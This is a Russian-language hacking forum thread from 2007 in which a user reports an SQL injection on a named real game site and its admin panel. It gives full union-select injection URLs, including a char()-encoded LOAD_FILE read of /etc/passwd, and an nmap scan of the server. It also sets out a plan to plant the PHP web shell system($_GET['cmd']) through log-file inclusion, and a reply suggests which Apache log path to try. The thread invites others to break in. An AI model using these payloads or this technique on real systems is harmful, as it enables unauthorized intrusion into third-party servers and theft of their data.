Что можно сделать с LOAD_FILE
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Что можно сделать с LOAD_FILE - 2007-04-17 17:42:03.386666
|
|
|
slavyan5
Сообщений: 3
Оценки: 0
Присоединился: 2007-04-17 16:59:52.716666
|
Нашел на одном сайте SQL инъекцию вида:
http://URL/' union select 0,1,2,3,4,5,6,7,8,9–%20/
Выдается следующая ошибка:
Warning: main(/home/sites/***/html/siteset/locales/public/***/normal/msg.6.php) [function.main]: failed to open stream: No such file or directory in /home/sites/***/html/siteset/templates/public/***/normal/primary.layout.php on line 4
Fatal error: main() [function.require]: Failed opening required …
Как видно, седьмой параметр выводится на экран (msg.6.php)
Точка каким-то образом фильтруется, поэтому доступ к другим БД (information_schema)
получить не удается, выводится 404 error, если в URL присутствует точка.
Остается только mysql LOAD_FILE. Файл /etc/passwd выводится. Файла /etc/shadow как будто не существует. К php исходникам доступ закрыт, не хватает прав. Если б можно было узнать, где лежат логи mysql и apache, можно было бы подключить через них shell <?php system($_GET['cmd']); ?>.
nmap выдал следующую информацию:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
22/tcp open ssh OpenSSH 3.8.1p1 Debian-8.sarge.6 (protocol 2.0)
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC Bind 9.2.4
80/tcp open http Apache httpd 2.0.54 ((Debian GNU/Linux) PHP/5.0.5-Debian-0.8~sarge1 mod_perl/1.999.21 Perl/v5.8.4)
110/tcp open pop3 Openwall popa3d
111/tcp open rpcbind 2 (rpc #100000)
10000/tcp open http Webmin httpd
Service Info: Host: ***; OS: Unix
Вопрос такой: какие файлы целесообразно попробовать подключить и где искать логи?
/var/log/messages тоже как будто не существует (сообщение об ошибке доступа не выводится).
|
|
|
|
|
RE: Что можно сделать с LOAD_FILE - 2007-04-17 17:57:23.353333
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Попробуй вывести /var/log/httpd/access_log
|
|
|
|
|
RE: Что можно сделать с LOAD_FILE - 2007-04-17 18:03:06.950000
|
|
|
slavyan5
Сообщений: 3
Оценки: 0
Присоединился: 2007-04-17 16:59:52.716666
|
Попробовал /var/log/httpd/access_log.
failed to open stream: No such file or directory
|
|
|
|
|
RE: Что можно сделать с LOAD_FILE - 2007-04-18 15:15:39.576666
|
|
|
slavyan5
Сообщений: 3
Оценки: 0
Присоединился: 2007-04-17 16:59:52.716666
|
Кстати сайт subj'а - http://www.divogames.ru
админка - http://www.divogames.ru/logon/
Инъекция:
http://www.divogames.ru/'%20union%20select%200,1,2,3,4,5,6,7,8,9–%20/
http://www.divogames.ru/logon/'%20and%20shell_id=105%20union%20select%200,1,2,3,4,5,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),7,8–%20/
Если кому-нибудь что-нибудь удастся с этим сделать, пишите в форум.
|
|
|
|
|
|
